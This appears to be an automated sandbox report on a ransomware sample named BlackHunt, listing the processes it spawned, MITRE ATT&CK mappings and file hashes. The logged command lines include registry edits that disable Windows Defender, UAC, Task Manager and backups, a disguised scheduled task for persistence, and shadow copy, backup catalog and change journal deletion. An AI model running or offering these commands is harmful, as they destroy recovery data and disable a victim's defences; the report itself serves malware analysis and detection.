vssadmin.exe 124 PID 3392 wrote to memory of 1336 3392 vssadmin.exe 124 PID 4020 wrote to memory of 1384 4020 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 128 PID 4020 wrote to memory of 1384 4020 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 128 PID 4984 wrote to memory of 4836 4984 cmd.exe 132 PID 4984 wrote to memory of 4836 4984 cmd.exe 132 PID 2980 wrote to memory of 1096 2980 cmd.exe 186 PID 2980 wrote to memory of 1096 2980 cmd.exe 186 PID 2220 wrote to memory of 2004 2220 cmd.exe 135 PID 2220 wrote to memory of 2004 2220 cmd.exe 135 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe"C:\Users\Admin\AppData\Local\Temp\cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4020 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4296 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:2892
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:4696
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵PID:2460
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:952 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:3136
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3216 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵PID:2908
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:4420
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵PID:4496
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2576 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:3180
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4520 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:4812
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4240 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:4832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3388 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:4044
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:1788
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:4488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2220
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:2004
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2412
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:4532
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:3040
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:4408
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:640
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:880
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:3164
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:552
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:1384
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:4576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4984 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:4836
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2980
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:1096
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4388
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:4772
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:3472
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:2792
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1792
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵
- Modifies registry class
PID:2460
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:688
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:4824
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1984
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:2976
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:3392
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:4052
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵
- Suspicious use of WriteProcessMemory
PID:4696
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4564
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:4032
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:900
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1284
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵
- Adds Run key to start application
PID:2908 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Modifies registry class
PID:4496
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:4392
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:4268
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:1924
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe" /F2⤵PID:980
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of WriteProcessMemory
PID:4420
-
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe" /F3⤵
- Creates scheduled task(s)
PID:2944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:4932
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4888
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:4380
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1192
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:1508
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
- Suspicious use of WriteProcessMemory
PID:3392
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:2208
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:2204
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:3668
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:1260
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:1096
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:5220
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:788
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:3852
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵
- Suspicious use of WriteProcessMemory
PID:2980 -
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:5516
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵
- Suspicious use of WriteProcessMemory
PID:2220 -
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:5524
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:3612
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:5448
-
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f1⤵PID:1336
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4412
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3272
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:5284
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:4512
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
3File Deletion
3Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
684B
MD5cae90188b2a927cffe448b187651b030
SHA1d82ddea429e49a84a0528245430b20459a371df4
SHA256e0027c26a7ef6c20b4ff98e2ecbe155a427eb88aeaa7a923b1d8e755a10fe5d7
SHA512dd66ef2984c1b360513d4b87add9100c279980978f73bb325ea580637b1301a792a8bb6d492ed75272a7b86975c400015e6857f88a635b66060860db62528537
-
Filesize
1KB
MD55c6414f4e1dbcb1b267373d254074b7e
SHA11350451f2db0a0173c47f17b61f4644f9645991a
SHA2565852e6a5e7921cdcfc5944e9ff369570dc73a43c860263373d0f3acc78025fee
SHA512e5fbd00a08a8bd45d8d760fb4404388ccd19435d57e725a7c1ac5fddf00bf85f32341ff2f919fbed4ebd3f3b854b98f3da2ef3534dc6e251c9e0fe0b6c96c849
-
Filesize
12KB
MD50aa29623835a3f2f42978019d69fe0df
SHA10b8725a830531186c13e34ab6c465ea684b72276
SHA2565c14313e1fdea7c5c98ef4799ac93c73d7842f9b8eb457202a4503d196d2bd15
SHA51236a447ce990bfae9a8d5853c2a1fa059d6df0e7625b253a583228d2c7e1b8458ed2afb0fbaf5762d94efcfdbae37dbe64362ef67c68a684667879e746b212e26